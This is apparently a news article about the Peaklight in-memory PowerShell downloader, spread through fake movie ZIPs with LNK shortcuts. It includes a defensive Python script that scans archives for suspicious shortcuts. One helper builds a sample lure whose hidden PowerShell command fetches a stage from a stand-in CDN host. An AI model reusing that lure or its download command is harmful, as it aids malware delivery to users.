A new wave of cybersecurity threats has emerged with the introduction of a sophisticated malware known as Peaklight, specifically targeting individuals who frequent illegal movie download sites. This “next-stage” malware is designed to infiltrate Windows computers, ultimately facilitating the deployment of information stealers and loaders. Security experts from Mandiant, a cybersecurity firm under Google’s umbrella, have issued a cautionary note regarding the significant risks associated with visiting these illicit platforms, which not only carry legal repercussions but also expose users to malware like Peaklight.
What is the “Peaklight” malware?
In a recent blog post, Mandiant described Peaklight as a stealthy form of malware that operates solely within a computer’s memory, leaving no discernible trace on the hard drive. This characteristic makes detection particularly challenging. The researchers indicated that Peaklight is engineered to discreetly download additional harmful software onto compromised Windows systems.
Mandiant elaborated, stating, “This memory-only dropper decrypts and executes a PowerShell-based downloader. This PowerShell-based downloader is being tracked as PEAKLIGHT,” highlighting the malware’s covert nature. The use of a PowerShell script allows Peaklight to deploy further malware onto infected systems, which may include notorious programs such as Lumma Stealer, Hijack Loader, and CryptBot. These malicious tools are often available for rent, enabling cybercriminals to extract sensitive information or gain control over compromised machines.
How hackers can use Peaklight to infect Windows PCs
According to the report, cybercriminals are disseminating Peaklight through deceptive movie downloads. They conceal harmful Windows shortcut files (LNKs) within ZIP folders masquerading as popular films. When these files are opened, they initiate a series of actions:
- Connection to a hidden source: The LNK file connects to a content delivery network (CDN) that harbors malicious JavaScript code. This code executes directly in the computer’s memory, ensuring no trace is left on the hard drive.
- Unleashing the malware downloader: The JavaScript activates a PowerShell script named Peaklight.
- Downloading more threats: Peaklight functions as a downloader, retrieving additional malware from a remote server. This could encompass dangerous programs like Lumma Stealer, Hijack Loader, and CryptBot, which are capable of stealing user data or granting attackers control over the user’s computer.
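The lure stage described above can be checked offline before anyone double-clicks. As an added example (not code from the Mandiant report or this article), the Python script below walks a ZIP archive, parses the Shell Link (.lnk) format of any shortcut inside, and flags shortcuts whose arguments reach for PowerShell or a URL; the archive, the shortcut, the indicator list and the CDN hostname are all constructed here and are assumptions, not indicators from the report.

```python
import io
import struct
import zipfile

HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
INDICATORS = ("powershell", "http://", "https://")  # assumed: a movie file never needs these

def lnk_arguments(data: bytes):
    """Return COMMAND_LINE_ARGUMENTS from a Shell Link (.lnk) file, or None if not a shortcut."""
    if data[:4] != b"L\0\0\0":                    # HeaderSize 0x4C marks a Shell Link
        return None
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C                                    # fixed-size ShellLinkHeader
    if flags & HAS_IDLIST:                        # skip LinkTargetIDList (2-byte size prefix)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                      # skip LinkInfo (size includes itself)
        pos += struct.unpack_from("<I", data, pos)[0]
    args, width = None, 2 if flags & IS_UNICODE else 1
    for flag in (HAS_NAME, HAS_RELPATH, HAS_WORKDIR, HAS_ARGS, HAS_ICON):
        if not flags & flag:
            continue                              # StringData entries appear in this fixed order
        count = struct.unpack_from("<H", data, pos)[0]
        text = data[pos + 2:pos + 2 + count * width].decode("utf-16-le" if width == 2 else "latin-1")
        pos += 2 + count * width
        if flag == HAS_ARGS:
            args = text
    return args

def triage_zip(zip_bytes: bytes):
    """List each .lnk in the archive as (name, arguments, suspicious)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith(".lnk"):
                args = lnk_arguments(zf.read(name)) or ""
                findings.append((name, args, any(i in args.lower() for i in INDICATORS)))
    return findings

def build_sample_lnk(args: str) -> bytes:
    """Constructed minimal .lnk: header with HasArguments|IsUnicode, then the arguments string."""
    header = struct.pack("<I16sI", 0x4C, b"\0" * 16, HAS_ARGS | IS_UNICODE).ljust(0x4C, b"\0")
    return header + struct.pack("<H", len(args)) + args.encode("utf-16-le")

def build_sample_zip() -> bytes:
    """Constructed lure: a 'movie' that is really a shortcut pointing PowerShell at a CDN URL."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Blockbuster.2024.1080p.mp4.lnk", build_sample_lnk('-w hidden -c "iwr https://cdn.example.invalid/stage"'))
    return buf.getvalue()
```

Real lures may carry an IDList and LinkInfo block before the arguments, which is why the parser honours those flags rather than assuming the minimal layout the sample uses.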
The report emphasizes the stealthy nature of this malware, as it operates entirely within the computer’s memory (RAM). This makes it exceptionally difficult for conventional antivirus software to detect, given that most programs primarily scan the hard drive for threats. Mandiant researchers Aaron Lee and Praveeth D’Souza noted, “PEAKLIGHT is an obfuscated PowerShell-based downloader that is part of a multi-stage execution chain that checks for the presence of ZIP archives in hard-coded file paths. If the archives do not exist, the downloader will reach out to a CDN site to download the remotely hosted archive file and save it to disk.”